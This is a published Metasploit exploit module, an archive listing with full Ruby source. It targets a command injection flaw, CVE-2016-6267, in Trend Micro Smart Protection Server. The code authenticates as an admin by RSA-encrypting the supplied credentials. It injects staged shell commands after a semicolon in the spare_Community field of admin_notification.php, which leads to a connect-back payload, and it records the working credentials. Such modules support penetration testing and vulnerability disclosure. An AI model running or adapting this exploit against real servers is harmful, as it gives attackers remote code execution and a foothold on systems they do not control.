Trend Micro Smart Protection Server Exec Remote Code Injection

Trend Micro Smart Protection Server Exec Remote Code Injection
Posted Nov 15, 2016
Authored by Quentin Kaiser | Site metasploit.com

This Metasploit module exploits a vulnerability found in TrendMicro Smart Protection Server where untrusted inputs are fed to ServWebExec system command, leading to command injection. Please note: authentication is required to exploit this vulnerability.

tags | exploit
MD5 | 9f38f195a977ff44bf8c8f1d118e3eba

Trend Micro Smart Protection Server Exec Remote Code Injection

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'openssl'
require 'base64'

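class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Version branch => first build treated as patched. A build strictly below
  # the listed number is reported Vulnerable; anything else (including
  # branches not listed here) is reported Safe, as in the original check.
  FIXED_BUILDS = { 3.0 => 1330, 2.6 => 2106, 2.5 => 2200 }.freeze

  # Patterns used to pull version/build out of php/about.php.
  VERSION_RE = /MSG_ABOUT_VERSION <\/td>[^<]*<td[^>]*>([^<]*)</
  BUILD_RE   = /MSG_ABOUT_BUILD <\/td>[^<]*<td[^>]*><span[^>]*>([^<]*)</

  # Patterns for the session cookie and the login form fields on index.php.
  COOKIE_NAME_RE = /([^=]*)=[^;]*;/
  PUBKEY_RE      = /name="pubkey" value="([^"]*)"/
  NONCE_RE       = /name="nonce" value="([^"]*)"/

  def initialize(info = {})
    super(update_info(info,
      'Name'        => "Trend Micro Smart Protection Server Exec Remote Code Injection",
      'Description' => %q{
This module exploits a vulnerability found in TrendMicro Smart Protection Server where untrusted inputs are fed to ServWebExec system command, leading to command injection.
Please note: authentication is required to exploit this vulnerability.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
        ],
      'References'  =>
        [
          ['CVE-ID', 'CVE-2016-6267']
        ],
      'Platform'    => 'linux',
      'Targets'     => [ [ 'Linux', {} ] ],
      'Payload'     => { 'BadChars' => "\x00" },
      'CmdStagerFlavor' => [ 'bourne' ],
      'Privileged'  => false,
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DisclosureDate' => "Aug 8 2016",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptAddress.new("LHOST", [true, "The local host for the exploits and handlers", Rex::Socket.source_address]),
        OptPort.new('LPORT', [true, "The port SPS will connect back to ", 4444 ]),
        OptString.new('ADMINACCOUNT', [true, 'Name of the SPS admin account', 'admin']),
        OptString.new('ADMINPASS', [true, 'Password of the SPS admin account', 'admin'])
      ])
  end

  # Logs in, reads php/about.php and compares version/build against
  # FIXED_BUILDS. Returns Unknown when login fails or the page cannot be
  # parsed, so a changed layout degrades to "unknown" instead of a crash.
  def check
    session = login
    return Exploit::CheckCode::Unknown unless session

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'php/about.php'),
      'vars_get' => { 'sid' => session['sid'] },
      'headers'  => session_headers(session['sid'], session['sid_value'])
    )
    return Exploit::CheckCode::Unknown unless res && res.code == 200

    version_str = last_capture(res.body, VERSION_RE)
    build_str   = last_capture(res.body, BUILD_RE)
    unless version_str && build_str
      print_status("TrendMicro Smart Protection Server detected, but the version/build could not be parsed.")
      return Exploit::CheckCode::Unknown
    end

    version = version_str.to_f
    build   = build_str.to_i(10)
    print_status("TrendMicro Smart Protection Server detected.")
    print_status("Version: #{version}")
    print_status("Build: #{build}")

    fixed_build = FIXED_BUILDS[version]
    if fixed_build && build < fixed_build
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # CmdStager callback: each staged command is injected through the
  # `spare_Community` field of admin_notification.php (after a `;`), which
  # is the parameter reaching ServWebExec. `opts` is the hash returned by
  # #login, handed through unchanged by execute_cmdstager. The 1s timeout is
  # deliberate: the payload keeps the request open, so we do not wait on it.
  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method'  => 'POST',
      'version' => '1.0',
      'timeout' => 1,
      'uri'     => normalize_uri(target_uri.path, 'php/admin_notification.php'),
      'ctype'   => 'application/x-www-form-urlencoded',
      'headers' => session_headers(opts['sid'], opts['sid_value']),
      'vars_post' => {
        'EnableSNMP'                => 'on',
        'Community'                 => 'hello',
        'submit'                    => 'Save',
        'pubkey'                    => '',
        'spare_EnableSNMP'          => 1,
        'spare_Community'           => "test;#{cmd}",
        'spare_EnableIPRestriction' => 0,
        'spare_AllowGroupIP'        => '',
        'spare_AllowGroupNetmask'   => '',
        'sid'                       => opts['sid']
      }
    )
  end

  # Authenticates against auth.php with ADMINACCOUNT/ADMINPASS.
  #
  # Returns {"sid" => cookie name, "sid_value" => cookie value} on a 302
  # response (the post-login cookie if the server re-issued one), or nil on
  # any failure. Everything scraped from the server (cookie name, modulus,
  # nonce) is treated as untrusted: missing fields return nil instead of
  # raising, and the cookie name is escaped before being used in a regexp.
  def login
    base = target_uri.path
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(base, 'index.php')
    )
    return nil unless res && res.code == 200 && !res.get_cookies.empty?

    cookies = res.get_cookies
    sid = last_capture(cookies, COOKIE_NAME_RE)
    return nil unless sid
    sid = sid.strip
    sid_value = last_capture(cookies, /#{Regexp.escape(sid)}=([a-z0-9]+);/)
    modulus   = last_capture(res.body, PUBKEY_RE)
    nonce     = last_capture(res.body, NONCE_RE)
    unless sid_value && modulus && nonce
      print_error("Login page did not contain the expected session cookie, pubkey and nonce.")
      return nil
    end

    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     => normalize_uri(base, 'auth.php'),
      'ctype'   => 'application/x-www-form-urlencoded',
      'headers' => session_headers(sid, sid_value),
      'vars_post' => {
        'data' => encrypt_credentials(modulus, nonce),
        'sid'  => sid
      }
    )
    return nil unless res && res.code == 302

    # The server may rotate the session cookie on successful login; prefer
    # the fresh one, but keep the pre-auth cookie if the new one is unparsable.
    if res.headers.key?('Set-Cookie')
      new_sid = last_capture(res.get_cookies, COOKIE_NAME_RE)
      new_value = new_sid && last_capture(res.get_cookies, /#{Regexp.escape(new_sid)}=([^;]*);/)
      if new_sid && new_value
        sid = new_sid
        sid_value = new_value
      end
    end

    report_cred(
      ip: datastore['RHOST'],
      port: datastore['RPORT'],
      service_name: (ssl ? "https" : "http"),
      user: datastore['ADMINACCOUNT'],
      password: datastore['ADMINPASS'],
      proof: "#{sid}=#{sid_value}"
    )
    { "sid" => sid, "sid_value" => sid_value }
  end

  # Stores the working admin credential in the database.
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def exploit
    session = login
    fail_with(Failure::NoAccess, 'An error occurred while logging in.') unless session

    print_status("Successfully logged in.")
    print_status("Exploiting...")
    # The session hash is passed straight through to #execute_command.
    execute_cmdstager(session)
  end

  private

  # Encrypts "user\tpass\tnonce" the way the login form does (presumably the
  # page's JavaScript does the same; confirm against the form): RSA with the
  # modulus served in the `pubkey` field, public exponent 65537 and OpenSSL's
  # default PKCS#1 v1.5 padding, then base64 for the `data` POST parameter.
  #
  # @param modulus_hex [String] hex-encoded RSA modulus scraped from index.php
  # @param nonce [String] per-request nonce scraped from index.php
  # @return [String] base64 ciphertext
  def encrypt_credentials(modulus_hex, nonce)
    key_der = OpenSSL::ASN1::Sequence.new(
      [
        OpenSSL::ASN1::Integer.new(modulus_hex.to_i(16)),
        OpenSSL::ASN1::Integer.new(0x10001)
      ]
    ).to_der
    public_key = OpenSSL::PKey::RSA.new(key_der)
    creds = "#{datastore['ADMINACCOUNT']}\t#{datastore['ADMINPASS']}\t#{nonce}"
    Base64.encode64(public_key.public_encrypt(creds))
  end

  # Scheme://host:port of the target, honouring the SSL option (the original
  # hard-coded https even when SSL was disabled).
  def base_url
    scheme = ssl ? 'https' : 'http'
    "#{scheme}://#{datastore['RHOST']}:#{datastore['RPORT']}"
  end

  # Headers every authenticated request carries: the session cookie plus the
  # Referer/Origin the application expects to see from its own login page.
  def session_headers(sid, sid_value)
    {
      'Cookie'  => "#{sid}=#{sid_value}",
      'Referer' => "#{base_url}/login.php",
      'Origin'  => base_url
    }
  end

  # First capture group of the LAST match of `regex` in `text`, or nil when
  # there is no match (the original `.scan(...).last.first` raised instead).
  def last_capture(text, regex)
    match = text.to_s.scan(regex).last
    match && match.first
  end
end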
